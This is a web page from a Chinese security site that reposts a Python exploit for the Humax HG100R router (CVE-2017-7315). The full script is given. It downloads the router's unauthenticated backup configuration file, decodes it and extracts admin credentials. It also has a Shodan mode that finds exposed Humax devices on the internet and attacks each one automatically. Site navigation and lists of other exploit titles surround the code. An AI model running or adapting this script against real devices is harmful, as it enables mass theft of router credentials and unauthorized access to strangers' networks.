首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Humax HG100R 2.0.6 - Backup File Download 来源：vfocus.net 作者：gambler 发布时间：2017-07-03   # coding: utf-8   # Exploit Title: Humax Backup file download # Date: 29/06/2017 # Exploit Author: gambler # Vendor Homepage: http://humaxdigital.com # Version: VER 2.0.6 # Tested on: OSX Linux # CVE : CVE-2017-7315   import sys import base64 import shodan import requests import subprocess   def banner():     print '''  ██░ ██  █    ██  ███▄ ▄███▓ ▄▄▄      ▒██   ██▒ ▓██░ ██▒ ██  ▓██▒▓██▒▀█▀ ██▒▒████▄    ▒▒ █ █ ▒░ ▒██▀▀██░▓██  ▒██░▓██    ▓██░▒██  ▀█▄  ░░  █   ░ ░▓█ ░██ ▓▓█  ░██░▒██    ▒██ ░██▄▄▄▄██  ░ █ █ ▒ ░▓█▒░██▓▒▒█████▓ ▒██▒   ░██▒ ▓█   ▓██▒▒██▒ ▒██▒  ▒ ░░▒░▒░▒▓▒ ▒ ▒ ░ ▒░   ░  ░ ▒▒   ▓▒█░▒▒ ░ ░▓ ░  ▒ ░▒░ ░░░▒░ ░ ░ ░  ░      ░  ▒   ▒▒ ░░░   ░▒ ░  ░  ░░ ░ ░░░ ░ ░ ░      ░     ░   ▒    ░    ░  ░  ░  ░   ░            ░         ░  ░ ░    ░     '''     print 'Description: Humax HG100R backup file download'     print 'Software Version: VER 2.0.6'     print 'SDK Version: 5.7.1mp1'     print 'IPv6 Stack Version: 1.2.2'     print 'Author: Gambler'     print 'Vulnerability founded: 14/03/2016'     print 'CVE: waiting'     print   def xplHelp():     print 'Exploit syntax error, Example:'     print 'python xpl.py http://192.168.0.1'   def exploit(server):     path = '/view/basic/GatewaySettings.bin'     if not server.startswith('http'):         server = 'http://%s' % server     if server.endswith('/'):         server = server[:-1]+''     url = '%s/%s' %(server,path)     print '[+] - Downloading configuration file and decoding'     try:         r = requests.get(url, stream=True,timeout=10)         for chunk in r.iter_content(chunk_size=1024):             if chunk:                 rawdata = r.content         save(rawdata)     except:         pass   def save(rawdata):     config = base64.b64decode(rawdata).decode('ascii','ignore').replace('^@','')     open('config.txt', 'w').write(config)     print '[+] - Done, file saved as config.txt'     infos = subprocess.Popen(["strings config.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0]     print '[+] - Credentials found'     print infos   def shodanSearch():     SHODAN_API_KEY = "SHODAN_API_KEY"     api = shodan.Shodan(SHODAN_API_KEY)     try:             results = api.search('Copyright © 2014 HUMAX Co., Ltd. All rights reserved.')             print 'Results found: %s' % results['total']             for result in results['matches']:                     router = 'http://%s:%s' % (result['ip_str'],result['port'])                     print router                     exploit(router)     except shodan.APIError, e:             print 'Error: %s' % e     if __name__ == '__main__':       if len(sys.argv) < 2:         xplHelp()         sys.exit()     banner()     if sys.argv[1] == 'shodan':         shodanSearch()     else:         exploit(sys.argv[1])   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ActiveMQ < 5.14.0 - web shell ·GoAutoDial 3.3 - Authenticatio ·Veritas/Symantec Backup Exec - ·Lepide Auditor Suite - 'create ·FreeBSD - 'setrlimit' Stack Cl ·rpcinfo Portmap DUMP Call Ampl ·FreeBSD - 'FGPE' Stack Clash P ·IoT mDNS/DNS-SD QM Amplificati ·FreeBSD - 'FGPU' Stack Clash P ·Firefox 54.0.1 - Denial of Ser ·Linux - 'ldso_dynamic' Local R ·Yaws 1.91 - Remote File Disclo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved